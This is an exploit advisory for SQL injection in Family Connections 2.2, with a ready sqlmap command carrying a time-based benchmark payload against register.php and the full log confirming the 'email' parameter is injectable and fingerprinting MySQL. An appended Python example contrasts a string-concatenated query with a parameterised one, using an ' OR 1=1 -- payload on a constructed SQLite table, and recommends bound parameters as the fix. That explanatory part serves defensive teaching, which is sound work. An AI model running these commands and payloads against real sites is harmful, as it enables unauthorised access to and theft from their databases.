# Exploit Title: Family Connections version 2.2 SQL Injection
# Date: March 15, 2010
# Author: Blake
# Software Link: http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.2/FCMS_2.2.zip/download
# Version: version 2.2
# Tested on: Windows XP SP3

Multiple SQL injection vulnerabilities exist in register.php and lostpw.php.

Example with sqlmap against register.php:

sqlmap -u "http://192.168.1.149/fcms/register.php" --method "POST" --data "username=%27+and+benchmark%2810000000%2CMD5%281%29%29%23&lname=on&fname=on&password=on&email=on&submit=Submit"

sqlmap/0.6.4 coded by Bernardo Damele A. G. and Daniele Bellucci

[*] starting at: 16:39:13

[16:39:13] [INFO] testing connection to the target url
[16:39:41] [INFO] testing if the url is stable, wait a few seconds
[16:40:37] [INFO] url is stable
[16:40:37] [INFO] testing if POST parameter 'username' is dynamic
[16:40:38] [WARNING] POST parameter 'username' is not dynamic
[16:40:38] [INFO] testing if POST parameter 'submit' is dynamic
[16:41:05] [WARNING] POST parameter 'submit' is not dynamic
[16:41:05] [INFO] testing if POST parameter 'lname' is dynamic
[16:41:33] [WARNING] POST parameter 'lname' is not dynamic
[16:41:33] [INFO] testing if POST parameter 'fname' is dynamic
[16:42:00] [WARNING] POST parameter 'fname' is not dynamic
[16:42:00] [INFO] testing if POST parameter 'password' is dynamic
[16:42:27] [WARNING] POST parameter 'password' is not dynamic
[16:42:27] [INFO] testing if POST parameter 'email' is dynamic
[16:42:57] [INFO] confirming that POST parameter 'email' is dynamic
[16:43:57] [WARNING] unable to connect to the target url or proxy, sqlmap is going to retry the request
[16:44:28] [INFO] POST parameter 'email' is dynamic
[16:44:28] [INFO] testing sql injection on POST parameter 'email' with 0 parenthesis
[16:44:28] [INFO] testing unescaped numeric injection on POST parameter 'email'
[16:44:57] [INFO] POST parameter 'email' is not unescaped numeric injectable
[16:44:57] [INFO] testing single quoted string injection on POST parameter 'email'
[16:45:54] [INFO] confirming single quoted string injection on POST parameter 'email'
[16:46:23] [INFO] POST parameter 'email' is single quoted string injectable with 0 parenthesis
[16:46:23] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[16:46:50] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[16:46:50] [INFO] testing for parenthesis on injectable parameter
[16:48:18] [INFO] the injectable parameter requires 0 parenthesis
[16:48:18] [INFO] testing MySQL
[16:48:46] [INFO] confirming MySQL
[16:49:13] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1
[16:49:13] [INFO] retrieved: 5
[16:55:25] [INFO] performed 13 queries in 371 seconds
[16:55:25] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL >= 5.0.0

[*] shutting down at: 16:55:25
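The sqlmap run above reports the 'email' POST parameter as "single quoted string injectable with 0 parenthesis": the value is being pasted into a quoted SQL string literal, so a quote in the input closes the literal and whatever follows is parsed as SQL. The example below is an added illustration of that defect class and of the fix a maintainer would apply; it is not code from Family Connections (whose actual register.php query is not shown on this page), and it uses an in-memory SQLite table with constructed rows rather than the application's MySQL schema. The payload shape follows the advisory's (quote, injected clause, comment marker), with SQLite's `--` comment standing in for MySQL's `#`.

```python
import sqlite3

# Constructed sample rows; the real application's users table is an assumption here.
SEED_USERS = [("alice", "alice@example.com"), ("bob", "bob@example.com")]


def make_db():
    """Build an in-memory table that plays the role of the registration lookup."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)"
    )
    conn.executemany("INSERT INTO users (username, email) VALUES (?, ?)", SEED_USERS)
    conn.commit()
    return conn


def build_vulnerable_sql(email):
    # The pattern behind a 'single quoted string injectable' finding: untrusted
    # input is concatenated into a quoted literal. A quote in the input ends the
    # literal and the remainder of the input becomes part of the statement.
    return "SELECT COUNT(*) FROM users WHERE email = '" + email + "'"


def email_in_use_vulnerable(conn, email):
    return conn.execute(build_vulnerable_sql(email)).fetchone()[0]


def email_in_use_safe(conn, email):
    # Parameterised query: the value travels separately from the SQL text, so
    # quotes and comment markers in it are just characters in a string.
    return conn.execute(
        "SELECT COUNT(*) FROM users WHERE email = ?", (email,)
    ).fetchone()[0]


def compare(email):
    """Return (vulnerable_count, safe_count) for one input value."""
    conn = make_db()
    try:
        return email_in_use_vulnerable(conn, email), email_in_use_safe(conn, email)
    finally:
        conn.close()


def vulnerable_raises_syntax_error(email):
    """True when the concatenated query no longer parses, which is the
    signal an error-based probe looks for; the safe query never errors."""
    conn = make_db()
    try:
        email_in_use_vulnerable(conn, email)
        return False
    except sqlite3.OperationalError:
        return True
    finally:
        conn.close()


if __name__ == "__main__":
    # Constructed payload in the advisory's shape: quote, injected clause, comment.
    payload = "' OR 1=1 --"
    print("benign :", compare("alice@example.com"))   # both paths agree: (1, 1)
    print("payload:", compare(payload))               # (2, 0): only the vulnerable path is fooled
    print("lone quote breaks vulnerable query:", vulnerable_raises_syntax_error("'"))
```

The two counts diverge only for the crafted input: the concatenated query matches every row because `OR 1=1` has become part of the WHERE clause, while the parameterised query looks for an e-mail address that literally contains the payload and finds none. A lone quote makes the concatenated statement unparseable, which is why the first step in fixing register.php and lostpw.php is to move every user-supplied value into a bound parameter rather than to filter individual characters.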